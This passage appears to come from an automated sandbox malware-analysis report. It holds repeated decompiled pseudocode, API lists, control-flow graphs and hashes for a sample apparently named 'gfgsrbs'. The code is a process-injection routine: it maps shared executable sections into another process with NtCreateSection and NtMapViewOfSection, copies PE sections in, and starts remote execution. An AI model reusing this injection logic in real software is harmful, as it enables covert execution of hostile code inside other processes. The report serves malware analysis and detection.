										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
										_t207 = _t207 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t195);
									_t232 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t195);
										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t178 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t199);
										_t176 = 0;
										__eflags = 0;
										_t108 = _t203 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
									} else {
										L53();
										_pop(_t179);
										_t176 = _t179 - 0x1760;
										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t207;
				return L0040119E(_t91, _t131, _t176, _t232);
			}















































                      0x004014b4
                      0x004014bc
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
                      • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 155 4014bf-4014c4 159 4014db 155->159 160 4014cc-4014f1 call 40119e 155->160 159->160 164 4014f3 160->164 165 4014f6-4014fb 160->165 164->165 167 401501-401512 165->167 168 401824-40182c 165->168 172 401822 167->172 173 401518-401541 167->173 168->165 171 401831-401842 168->171 175 401845-401866 call 40119e 171->175 176 401838-40183e 171->176 172->171 173->172 183 401547-40155e NtDuplicateObject 173->183 176->175 183->172 184 401564-401588 NtCreateSection 183->184 186 4015e4-40160a NtCreateSection 184->186 187 40158a-4015ab NtMapViewOfSection 184->187 186->172 190 401610-401614 186->190 187->186 189 4015ad-4015c9 NtMapViewOfSection 187->189 189->186 191 4015cb-4015e1 189->191 190->172 192 40161a-40163b NtMapViewOfSection 190->192 191->186 192->172 193 401641-40165d NtMapViewOfSection 192->193 193->172 195 401663 call 401668 193->195
                      C-Code - Quality: 62%
                      			E004014BF(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				asm("invalid");
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L21();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L54();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                      0x004014bf
                      0x004014bc
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                      • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014DA Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 197 4014da-4014f1 call 40119e 203 4014f3 197->203 204 4014f6-4014fb 197->204 203->204 206 401501-401512 204->206 207 401824-40182c 204->207 211 401822 206->211 212 401518-401541 206->212 207->204 210 401831-401842 207->210 214 401845-401866 call 40119e 210->214 215 401838-40183e 210->215 211->210 212->211 222 401547-40155e NtDuplicateObject 212->222 215->214 222->211 223 401564-401588 NtCreateSection 222->223 225 4015e4-40160a NtCreateSection 223->225 226 40158a-4015ab NtMapViewOfSection 223->226 225->211 229 401610-401614 225->229 226->225 228 4015ad-4015c9 NtMapViewOfSection 226->228 228->225 230 4015cb-4015e1 228->230 229->211 231 40161a-40163b NtMapViewOfSection 229->231 230->225 231->211 232 401641-40165d NtMapViewOfSection 231->232 232->211 234 401663 call 401668 232->234
                      C-Code - Quality: 62%
                      			E004014DA(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				_pop(_t84);
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L18();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                      0x004014da
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
